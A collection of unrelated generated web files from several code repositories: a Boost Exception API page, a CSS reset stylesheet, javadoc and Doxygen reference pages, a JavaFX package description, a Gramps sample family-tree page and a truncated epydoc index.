<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'> <html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'> <head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'/> <title>tuple/operator&lt;&lt;</title> <link href='reno.css' type='text/css' rel='stylesheet'/> </head> <body> <div class="body-0"> <div class="body-1"> <div class="body-2"> <div> <div id="boost_logo"> <a href="http://www.boost.org"><img style="border:0" src="http://www.boost.org/boost.png" alt="Boost" width="277" height="86"/></a> </div> <h1>Boost Exception</h1> </div> <!-- Copyright (c) 2006-2008 Emil Dotchevski and Reverge Studios, Inc. --> <!-- Distributed under the Boost Software License, Version 1.0. (See accompanying --> <!-- file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) --> <div class="RenoIncludeDIV"><div class="RenoAutoDIV"><h3>tuple/operator&lt;&lt;</h3> </div> <div class="RenoIncludeDIV"><p><span class="RenoEscape">&#35;<!--<wiki>`&#35;</wiki>--></span>include &lt;<span class="RenoLink"><a href="exception_error_info_group_hpp.html">boost/exception/info_tuple.hpp</a></span>&gt;</p> <pre>namespace boost { <span class="RenoIncludeSPAN"> template &lt;class E, class Tag1, class T1, ..., class TagN, class TN&gt; E const &amp; <span class="RenoLink"><a href="tuple_operator_shl.html">operator&lt;&lt;</a></span>( E const &amp; x, <span class="RenoLink"><a href="http://www.boost.org/libs/tuple/doc/tuple_users_guide.html">tuple</a></span>&lt; <span class="RenoLink"><a href="error_info.html">error_info</a></span>&lt;Tag1,T1&gt;, ..., <span class="RenoLink"><a href="error_info.html">error_info</a></span>&lt;TagN,TN&gt; &gt; const &amp; v );</span> }</pre> </div><h4>Requirements:</h4> <p>E must be boost::<span class="RenoLink"><a href="exception.html">exception</a></span>, or a type that derives (indirectly) from boost::<span class="RenoLink"><a href="exception.html">exception</a></span>.</p> <h4>Effects:</h4> <p>Equivalent to x &lt;&lt; v.<span class="RenoLink"><a href="http://www.boost.org/libs/tuple/doc/tuple_users_guide.html#accessing_elements">get</a></span>&lt;0&gt;() &lt;&lt; ... &lt;&lt; v.<span class="RenoLink"><a href="http://www.boost.org/libs/tuple/doc/tuple_users_guide.html#accessing_elements">get</a></span>&lt;N&gt;().</p> <h4>Returns:</h4> <p>x.</p> <div class="RenoIncludeDIV"><h4>Throws:</h4> <p>std::bad_alloc, or any exception emitted by T1..TN copy constructor.</p> </div></div><div class="RenoAutoDIV"><div class="RenoHR"><hr/></div> <h3>See Also:</h3> <div class="RenoPageList"><a href="boost-exception.html">Boost Exception<br/> </a><a href="exception_error_info_group_hpp.html">boost/exception/info_tuple.hpp<br/> </a></div> </div> <!-- Copyright (c) 2006-2008 Emil Dotchevski and Reverge Studios, Inc. --> <!-- Distributed under the Boost Software License, Version 1.0. (See accompanying --> <!-- file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) --> <div id="footer"> <p>&nbsp;</p> <hr/> <p> <a class="logo" href="http://jigsaw.w3.org/css-validator/validator?uri=http://revergestudios.com/boost-exception/reno.css"><img class="logo_pic" src="valid-css.png" alt="Valid CSS" height="31" width="88"/></a> <a class="logo" href="http://validator.w3.org/check?uri=referer"><img class="logo_pic" src="valid-xhtml.png" alt="Valid XHTML 1.0" height="31" width="88"/></a> <small>Copyright (c) 2006-2008 by Emil Dotchevski and Reverge Studios, Inc.<br/> Distributed under the <a href="http://www.boost.org/LICENSE_1_0.txt">Boost Software License, Version 1.0</a>.</small> </p> </div> </div> </div> </div> </body> </html>
src/main/webapp/resources/css/main.css
icesphere/star-realms
/** * Eric Meyer's Reset CSS v2.0 (http://meyerweb.com/eric/tools/css/reset/) * http://cssreset.com */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video { margin: 0; padding: 0; border: 0; vertical-align: baseline; } /* HTML5 display-role reset for older browsers */ article, aside, details, figcaption, figure, footer, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none; } blockquote, q { quotes: none; } blockquote:before, blockquote:after, q:before, q:after { content: ''; content: none; } table { border-collapse: collapse; border-spacing: 0; } .ui-widget, .ui-widget .ui-widget { font-size: 90%; font-family: Times, serif; } #contentDiv { } .captionText { font-size: 10px; color: #999999; } .footerText { clear: both; font-size: 12px; margin-bottom: 10px; } .errorText { color: #FF3333; } .successText { color: #66AA66; } .boldText { font-weight: bold; } .underlineText { text-decoration: underline; } a { color: #151EA9; } .centerDiv { margin-left: auto; margin-right: auto; width: 90%; } .mediumLeftMargin { margin-left: 15px; } .menu { float: right; padding-right: 3px; padding-top: 10px; margin: 0 20px; } .alignLeft { text-align: left; } .alignCenter { text-align: center; } .alignTop { vertical-align: top; } .alignMiddle { vertical-align: middle; } .alignRight { text-align: right; } .smallRightPadding { padding-right: 10px; } .mediumRightPadding { padding-right: 15px; } .tinyBottomPadding { padding-bottom: 5px; } .smallBottomPadding { padding-bottom: 10px; } .smallTopPadding { padding-top: 10px; } .bigTopMargin { margin-top: 20px; } .quote { color: #999999; } .smallText { font-size: 12px; } .navigationLink { float: left; } .radioSpacing td { padding-right: 10px; } .backToTopLink { display: none; }
turbulence/docs/unitTests/Airspace_Tests.html
PaintScratcher/WAW-SEPR-Website
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_07) on Wed Jan 22 03:27:43 GMT 2014 --> <title>Airspace_Tests</title> <meta name="date" content="2014-01-22"> <link rel="stylesheet" type="text/css" href="../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Airspace_Tests"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/Airspace_Tests.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../deprecated-list.html">Deprecated</a></li> <li><a href="../index-files/index-1.html">Index</a></li> <li><a href="../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../unitTests/Airport_Tests.html" title="class in unitTests"><span class="strong">Prev Class</span></a></li> <li><a href="../unitTests/Flight_Tests.html" title="class in unitTests"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../index.html?unitTests/Airspace_Tests.html" target="_top">Frames</a></li> <li><a href="Airspace_Tests.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor_summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor_detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">unitTests</div> <h2 title="Class Airspace_Tests" class="title">Class Airspace_Tests</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li>unitTests.Airspace_Tests</li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <hr> <br> <pre>public class <span class="strong">Airspace_Tests</span> extends java.lang.Object</pre> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor_summary"> <!-- --> </a> <h3>Constructor Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Constructor and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><strong><a href="../unitTests/Airspace_Tests.html#Airspace_Tests()">Airspace_Tests</a></strong>()</code>&nbsp;</td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../unitTests/Airspace_Tests.html#changeScoreTest()">changeScoreTest</a></strong>()</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../unitTests/Airspace_Tests.html#checkIfFlightHasLeftAirspaceTest()">checkIfFlightHasLeftAirspaceTest</a></strong>()</code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../unitTests/Airspace_Tests.html#generateFlightNameTest()">generateFlightNameTest</a></strong>()</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../unitTests/Airspace_Tests.html#newEntryPointTest()">newEntryPointTest</a></strong>()</code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../unitTests/Airspace_Tests.html#newExitPointTest()">newExitPointTest</a></strong>()</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../unitTests/Airspace_Tests.html#newWaypointTest()">newWaypointTest</a></strong>()</code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../unitTests/Airspace_Tests.html#resetAirspaceTest()">resetAirspaceTest</a></strong>()</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>void</code></td> <td class="colLast"><code><strong><a href="../unitTests/Airspace_Tests.html#setUp()">setUp</a></strong>()</code>&nbsp;</td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>equals, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ========= CONSTRUCTOR DETAIL ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor_detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="Airspace_Tests()"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>Airspace_Tests</h4> <pre>public&nbsp;Airspace_Tests()</pre> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="setUp()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>setUp</h4> <pre>public&nbsp;void&nbsp;setUp()</pre> </li> </ul> <a name="resetAirspaceTest()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>resetAirspaceTest</h4> <pre>public&nbsp;void&nbsp;resetAirspaceTest()</pre> </li> </ul> <a name="newWaypointTest()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>newWaypointTest</h4> <pre>public&nbsp;void&nbsp;newWaypointTest()</pre> </li> </ul> <a name="newExitPointTest()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>newExitPointTest</h4> <pre>public&nbsp;void&nbsp;newExitPointTest()</pre> </li> </ul> <a name="newEntryPointTest()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>newEntryPointTest</h4> <pre>public&nbsp;void&nbsp;newEntryPointTest()</pre> </li> </ul> <a name="generateFlightNameTest()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>generateFlightNameTest</h4> <pre>public&nbsp;void&nbsp;generateFlightNameTest()</pre> </li> </ul> <a name="checkIfFlightHasLeftAirspaceTest()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>checkIfFlightHasLeftAirspaceTest</h4> <pre>public&nbsp;void&nbsp;checkIfFlightHasLeftAirspaceTest()</pre> </li> </ul> <a name="changeScoreTest()"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>changeScoreTest</h4> <pre>public&nbsp;void&nbsp;changeScoreTest()</pre> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/Airspace_Tests.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../deprecated-list.html">Deprecated</a></li> <li><a href="../index-files/index-1.html">Index</a></li> <li><a href="../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../unitTests/Airport_Tests.html" title="class in unitTests"><span class="strong">Prev Class</span></a></li> <li><a href="../unitTests/Flight_Tests.html" title="class in unitTests"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../index.html?unitTests/Airspace_Tests.html" target="_top">Frames</a></li> <li><a href="Airspace_Tests.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor_summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor_detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
modules/graphics/src/main/java/javafx/scene/canvas/package.html
maiklos-mirrors/jfx78
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta content="text/html; charset=ISO-8859-1" http-equiv="content-type"> <title>javafx.scene.input</title> </head> <body> <p>Provides the set of classes for canvas, an immediate mode style of rendering API.</p> </body> </html>
docs/html/datastorageconf_8h.html
alexcetto/kaikalib
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"> <title>KAIKALib: src/conf/datastorageconf.h File Reference</title> <link href="doxygen.css" rel="stylesheet" type="text/css"> <link href="tabs.css" rel="stylesheet" type="text/css"> </head><body> <!-- Generated by Doxygen 1.5.3 --> <div class="tabs"> <ul> <li><a href="index.html"><span>Main&nbsp;Page</span></a></li> <li><a href="modules.html"><span>Modules</span></a></li> <li><a href="annotated.html"><span>Classes</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> </ul> </div> <h1>src/conf/datastorageconf.h File Reference</h1>Data storage interface configuration. <a href="#_details">More...</a> <p> <code>#include &quot;<a class="el" href="dfconf_8h.html">dfconf.h</a>&quot;</code><br> <table border="0" cellpadding="0" cellspacing="0"> <tr><td></td></tr> <tr><td colspan="2"><br><h2>Classes</h2></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">struct &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="structTMyParamStorageS.html">TMyParamStorageS</a></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">struct &nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="structTMyDataStorageS.html">TMyDataStorageS</a></td></tr> <tr><td colspan="2"><br><h2>Defines</h2></td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">#define&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="datastorageconf_8h.html#d2e11e380d3b2e759109afa27a368fdd">DATA_STORAGE_BUFFER_NUMBER</a>&nbsp;&nbsp;&nbsp;1</td></tr> <tr><td class="memItemLeft" nowrap align="right" valign="top">#define&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="datastorageconf_8h.html#69510c1ced83f3b27701f7cc207cd3c4">SIZE_OF_GENERAL_BUFFER</a>&nbsp;&nbsp;&nbsp;10</td></tr> </table> <hr><a name="_details"></a><h2>Detailed Description</h2> Data storage interface configuration. <p> <hr><h2>Define Documentation</h2> <a class="anchor" name="d2e11e380d3b2e759109afa27a368fdd"></a><!-- doxytag: member="datastorageconf.h::DATA_STORAGE_BUFFER_NUMBER" ref="d2e11e380d3b2e759109afa27a368fdd" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">#define DATA_STORAGE_BUFFER_NUMBER&nbsp;&nbsp;&nbsp;1 </td> </tr> </table> </div> <div class="memdoc"> <p> define the buffer will be used Dataflash has one or two buffers </div> </div><p> <a class="anchor" name="69510c1ced83f3b27701f7cc207cd3c4"></a><!-- doxytag: member="datastorageconf.h::SIZE_OF_GENERAL_BUFFER" ref="69510c1ced83f3b27701f7cc207cd3c4" args="" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">#define SIZE_OF_GENERAL_BUFFER&nbsp;&nbsp;&nbsp;10 </td> </tr> </table> </div> <div class="memdoc"> <p> define the size of general buffer. At least the size of major struct </div> </div><p> <hr size="1"><address style="text-align: right;"><small>Generated on Tue Jan 22 22:44:02 2008 for KAIKALib by&nbsp; <a href="http://www.doxygen.org/index.html"> <img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.5.3 </small></address> </body> </html>
gramps42/gramps/example_NAVWEB0/ppl/w/v/2ZZJQC5SE4U66ZPIVW.html
belissent/testing-example-reports
<!DOCTYPE html> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <head lang="en-US"> <title>My Family Tree - Warner, Amber Lynne</title> <meta charset="UTF-8" /> <meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" /> <meta name ="apple-mobile-web-app-capable" content="yes" /> <meta name="generator" content="Gramps 4.2.2 http://gramps-project.org/" /> <meta name="author" content="" /> <link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" /> <link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" /> <link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" /> <link href="../../../css/ancestortree.css" media="screen" rel="stylesheet" type="text/css" /> </head> <body> <div id="header"> <h1 id="SiteTitle">My Family Tree</h1> </div> <div class="wrapper" id="nav" role="navigation"> <div class="container"> <ul class="menu" id="dropmenu"> <li class = "CurrentSection"><a href="../../../individuals.html" title="Individuals">Individuals</a></li> <li><a href="../../../index.html" title="Surnames">Surnames</a></li> <li><a href="../../../places.html" title="Places">Places</a></li> <li><a href="../../../sources.html" title="Sources">Sources</a></li> <li><a href="../../../media.html" title="Media">Media</a></li> <li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li> </ul> </div> </div> <div class="content" id="IndividualDetail"> <h3>Warner, Amber Lynne<sup><small> <a href="#sref1">1</a></small></sup></h3> <div id="summaryarea"> <table class="infolist"> <tr> <td class="ColumnAttribute">Birth Name</td> <td class="ColumnValue"> Warner, Amber Lynne </td> </tr> <tr> <td class="ColumnAttribute">Gramps&nbsp;ID</td> <td class="ColumnValue">I0335</td> </tr> <tr> <td class="ColumnAttribute">Gender</td> <td class="ColumnValue">female</td> </tr> </table> </div> <div class="subsection" id="events"> <h4>Events</h4> <table class="infolist eventlist"> <thead> <tr> <th class="ColumnEvent">Event</th> <th class="ColumnDate">Date</th> <th class="ColumnPlace">Place</th> <th class="ColumnDescription">Description</th> <th class="ColumnNotes">Notes</th> <th class="ColumnSources">Sources</th> </tr> </thead> <tbody> <tr> <td class="ColumnEvent"> Birth </td> <td class="ColumnDate">1985-05-27</td> <td class="ColumnPlace"> <a href="../../../plc/6/2/DZZJQC6BA6324ITC26.html" title="Bluefield, WV-VA, USA"> Bluefield, WV-VA, USA </a> </td> <td class="ColumnDescription"> Birth of Warner, Amber Lynne </td> <td class="ColumnNotes"> <div> </div> </td> <td class="ColumnSources"> &nbsp; </td> </tr> <tr> <td class="ColumnEvent"> LVG </td> <td class="ColumnDate">&nbsp;</td> <td class="ColumnPlace">&nbsp;</td> <td class="ColumnDescription"> Custom FTW5 tag to specify LIVING not specified in GEDCOM 5.5 </td> <td class="ColumnNotes"> <div> </div> </td> <td class="ColumnSources"> &nbsp; </td> </tr> </tbody> </table> </div> <div class="subsection" id="parents"> <h4>Parents</h4> <table class="infolist"> <thead> <tr> <th class="ColumnAttribute">Relation to main person</th> <th class="ColumnValue">Name</th> <th class="ColumnValue">Relation within this family (if not by birth)</th> </tr> </thead> <tbody> </tbody> <tr> <td class="ColumnAttribute">Father</td> <td class="ColumnValue"> <a href="../../../ppl/3/4/65XJQCK9107OGRAU43.html">Warner, Robert Douglas<span class="grampsid"> [I0166]</span></a> </td> </tr> <tr> <td class="ColumnAttribute">Mother</td> <td class="ColumnValue"> <a href="../../../ppl/o/n/JYZJQCL67ILUSF65NO.html">Norton, Christina<span class="grampsid"> [I0334]</span></a> </td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/w/v/2ZZJQC5SE4U66ZPIVW.html">Warner, Amber Lynne<span class="grampsid"> [I0335]</span></a></td> <td class="ColumnValue"></td> </tr> <tr> <td class="ColumnAttribute">&nbsp;&nbsp;&nbsp;&nbsp;Sister</td> <td class="ColumnValue">&nbsp;&nbsp;&nbsp;&nbsp;<a href="../../../ppl/y/u/6BDKQCEYWGOYB9H9UY.html">Warner, Whitney Lianne<span class="grampsid"> [I0983]</span></a></td> <td class="ColumnValue"></td> </tr> </table> </div> <div class="subsection" id="pedigree"> <h4>Pedigree</h4> <ol class="pedigreegen"> <li> <a href="../../../ppl/3/4/65XJQCK9107OGRAU43.html">Warner, Robert Douglas<span class="grampsid"> [I0166]</span></a> <ol> <li class="spouse"> <a href="../../../ppl/o/n/JYZJQCL67ILUSF65NO.html">Norton, Christina<span class="grampsid"> [I0334]</span></a> <ol> <li class="thisperson"> Warner, Amber Lynne </li> <li> <a href="../../../ppl/y/u/6BDKQCEYWGOYB9H9UY.html">Warner, Whitney Lianne<span class="grampsid"> [I0983]</span></a> </li> </ol> </li> </ol> </li> </ol> </div> <div class="subsection" id="tree"> <h4>Ancestors</h4> <div id="treeContainer" style="width:735px; height:602px;"> <div class="boxbg female AncCol0" style="top: 269px; left: 6px;"> <a class="noThumb" href="../../../ppl/w/v/2ZZJQC5SE4U66ZPIVW.html"> Warner, Amber Lynne </a> </div> <div class="shadow" style="top: 274px; left: 10px;"></div> <div class="bvline" style="top: 301px; left: 165px; width: 15px"></div> <div class="gvline" style="top: 306px; left: 165px; width: 20px"></div> <div class="boxbg male AncCol1" style="top: 119px; left: 196px;"> <a class="noThumb" href="../../../ppl/3/4/65XJQCK9107OGRAU43.html"> Warner, Robert Douglas </a> </div> <div class="shadow" style="top: 124px; left: 200px;"></div> <div class="bvline" style="top: 151px; left: 180px; width: 15px;"></div> <div class="gvline" style="top: 156px; left: 185px; width: 20px;"></div> <div class="bhline" style="top: 151px; left: 180px; height: 150px;"></div> <div class="gvline" style="top: 156px; left: 185px; height: 150px;"></div> <div class="bvline" style="top: 151px; left: 355px; width: 15px"></div> <div class="gvline" style="top: 156px; left: 355px; width: 20px"></div> <div class="boxbg male AncCol2" style="top: 44px; left: 386px;"> <a class="noThumb" href="../../../ppl/y/9/CKWJQCVMWLSYJM8C9Y.html"> Walker, Andrew Vincent </a> </div> <div class="shadow" style="top: 49px; left: 390px;"></div> <div class="bvline" style="top: 76px; left: 370px; width: 15px;"></div> <div class="gvline" style="top: 81px; left: 375px; width: 20px;"></div> <div class="bhline" style="top: 76px; left: 370px; height: 75px;"></div> <div class="gvline" style="top: 81px; left: 375px; height: 75px;"></div> <div class="bvline" style="top: 76px; left: 545px; width: 15px"></div> <div class="gvline" style="top: 81px; left: 545px; width: 20px"></div> <div class="boxbg male AncCol3" style="top: 7px; left: 576px;"> <a class="noThumb" href="../../../ppl/l/u/ENTJQCZXQV1IRKJXUL.html"> Warner, Martin Bogarte </a> </div> <div class="shadow" style="top: 12px; left: 580px;"></div> <div class="bvline" style="top: 39px; left: 560px; width: 15px;"></div> <div class="gvline" style="top: 44px; left: 565px; width: 20px;"></div> <div class="bhline" style="top: 39px; left: 560px; height: 37px;"></div> <div class="gvline" style="top: 44px; left: 565px; height: 37px;"></div> <div class="boxbg female AncCol3" style="top: 81px; left: 576px;"> <a class="noThumb" href="../../../ppl/u/j/9GUJQCBJMTV7R6EJU.html"> Page, Clara Belle </a> </div> <div class="shadow" style="top: 86px; left: 580px;"></div> <div class="bvline" style="top: 113px; left: 560px; width: 15px;"></div> <div class="gvline" style="top: 118px; left: 565px; width: 20px;"></div> <div class="bhline" style="top: 76px; left: 560px; height: 37px;"></div> <div class="gvline" style="top: 81px; left: 565px; height: 37px;"></div> <div class="boxbg female AncCol2" style="top: 194px; left: 386px;"> <a class="noThumb" href="../../../ppl/z/6/KRWJQCKWUECEN3GY6Z.html"> Pearson, Eileen Ruth </a> </div> <div class="shadow" style="top: 199px; left: 390px;"></div> <div class="bvline" style="top: 226px; left: 370px; width: 15px;"></div> <div class="gvline" style="top: 231px; left: 375px; width: 20px;"></div> <div class="bhline" style="top: 151px; left: 370px; height: 75px;"></div> <div class="gvline" style="top: 156px; left: 375px; height: 75px;"></div> <div class="boxbg female AncCol1" style="top: 419px; left: 196px;"> <a class="noThumb" href="../../../ppl/o/n/JYZJQCL67ILUSF65NO.html"> Norton, Christina </a> </div> <div class="shadow" style="top: 424px; left: 200px;"></div> <div class="bvline" style="top: 451px; left: 180px; width: 15px;"></div> <div class="gvline" style="top: 456px; left: 185px; width: 20px;"></div> <div class="bhline" style="top: 301px; left: 180px; height: 150px;"></div> <div class="gvline" style="top: 306px; left: 185px; height: 150px;"></div> </div> </div> <div class="subsection" id="sourcerefs"> <h4>Source References</h4> <ol> <li> <a href="../../../src/x/a/X5TJQC9JXU4RKT6VAX.html" title="Import from test2.ged" name ="sref1"> Import from test2.ged <span class="grampsid"> [S0003]</span> </a> </li> </ol> </div> </div> <div class="fullclear"></div> <div id="footer"> <p id="createdate"> Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.2 on 2015-12-25<br />Last change was the 2007-07-26 08:34:25 </p> <p id="copyright"> </p> </div> </body> </html>
Schrodinger/Schrodinger_2015-2_docs/python_api/api/toc-schrodinger.application.licensing.licerror-module.html
platinhom/ManualHom
<?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>licerror</title> <link rel="stylesheet" href="epydoc.css" type="text/css" /> <script type="text/javascript" src="epydoc.js"></script> </head> <body bgcolor="white" text="black" link="blue" vlink="#204080" alink="#204080"> <h1 class="toc">Module licerror</h1> <hr /> <h2 class="toc">Classes</h2> <a target="mainFrame" href="schrodinger.application.licensing.licerror.LicenseError-class.html" >LicenseError</a><br /> <a target="mainFrame" href="schrodinger.application.licensing.licerror.LicenseException-class.html" >LicenseException</a><br /> <div class="private"> <a target="mainFrame" href="schrodinger.application.licensing.licerror._ErrorLevel-class.html" >_ErrorLevel</a><br /> </div> <h2 class="toc">Functions</h2> <div class="private"> <a target="mainFrame" href="schrodinger.application.licensing.licerror-module.html#_define" >_define</a><br /> </div> <h2 class="toc">Variables</h2> <a target="mainFrame" href="schrodinger.application.licensing.licerror-module.html#ERROR" >ERROR</a><br /> <a target="mainFrame" 